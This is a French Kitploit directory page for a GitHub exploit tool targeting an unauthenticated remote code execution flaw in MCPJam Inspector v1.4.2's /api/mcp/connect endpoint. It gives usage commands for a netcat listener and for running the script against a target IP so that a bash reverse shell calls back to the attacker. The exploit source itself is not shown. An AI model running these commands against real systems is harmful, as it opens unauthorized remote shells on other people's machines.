Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23744-RCE — Cet utilitaire a été créé lors de recherches impliquant MCPJam v1.4.2. L'application expose un point de terminaison API qui accepte un objet de configuration serveur. Sous certaines conditions, une validation insuffisante peut permettre une exécution de commande non intentionnelle. | Kitploit
Outils/GitHubGitHub/alisster00/cve-2026-23744-rce
Analyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'IntrusionApprentissage et ÉducationOutil d'Accès à Distance
GitHubalisster00/cve-2026-23744-rce

CVE-2026-23744-RCE

Voir le dépôt

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →

À propos

Cet utilitaire a été créé lors de recherches impliquant MCPJam v1.4.2. L'application expose un point de terminaison API qui accepte un objet de configuration serveur. Sous certaines conditions, une validation insuffisante peut permettre une exécution de commande non intentionnelle.

1il y a 2 moisPas encore vérifié
Partager

MCPJam Inspector v1.4.2 - Exploit RCE

Description de la vulnérabilité

MCPJam Inspector contient une vulnérabilité d'exécution de code à distance (RCE) non authentifiée dans le point d'accès /api/mcp/connect. Cette vulnérabilité permet aux attaquants d'exécuter des commandes arbitraires en envoyant une charge utile malveillante de configuration de serveur MCP.

Le point d'accès accepte une charge utile JSON avec un objet serverConfig contenant un tableau command et args, qui sont exécutés directement sur le système sans validation ni assainissement appropriés.

Versions affectées

  • MCPJam Inspector v1.4.2 et probablement les versions antérieures

Utilisation

Prérequis

  • Python 3.6+
  • Bibliothèque requests : pip install requests
  • netcat ou socat pour l'écouteur

Démarrage rapide

Terminal 1 - Démarrer l'écouteur :

root@kitploit:~
nc -lvnp 4444

Terminal 2 - Exécuter l'exploit :

root@kitploit:~
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444

Exemples

root@kitploit:~
# Par défaut (port 6274, port de rappel 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>

# Port MCPJam personnalisé
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>

# Port d'écoute personnalisé
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555

Fonctionnement

  1. Le script vérifie que MCPJam est accessible sur la cible
  2. Construit une charge utile malveillante de serveur MCP avec un shell inverse bash
  3. Envoie la charge utile au point d'accès /api/mcp/connect
  4. MCPJam traite la commande et initie un rappel de shell inverse
  5. L'utilisateur reçoit un shell interactif sur l'écouteur

Avertissement

⚠️ AVERTISSEMENT :

Cet exploit est fourni uniquement à des fins éducatives et de tests de sécurité autorisés. L'accès non autorisé aux systèmes informatiques est illégal. Les utilisateurs sont seuls responsables de :

  • Obtenir une autorisation appropriée avant de tester tout système
  • Respect de toutes les lois et réglementations applicables
  • Tout dommage ou conséquence juridique résultant d'une mauvaise utilisation

L'auteur décline toute responsabilité en cas d'utilisation abusive ou de dommages causés par cet outil. Utilisez-le à vos propres risques.

Détails techniques

  • Endpoint vulnérable : /api/mcp/connect
  • Méthode : POST
  • Authentification : Aucune requise
  • Impact : Exécution de code à distance non authentifiée
Télécharger l’outil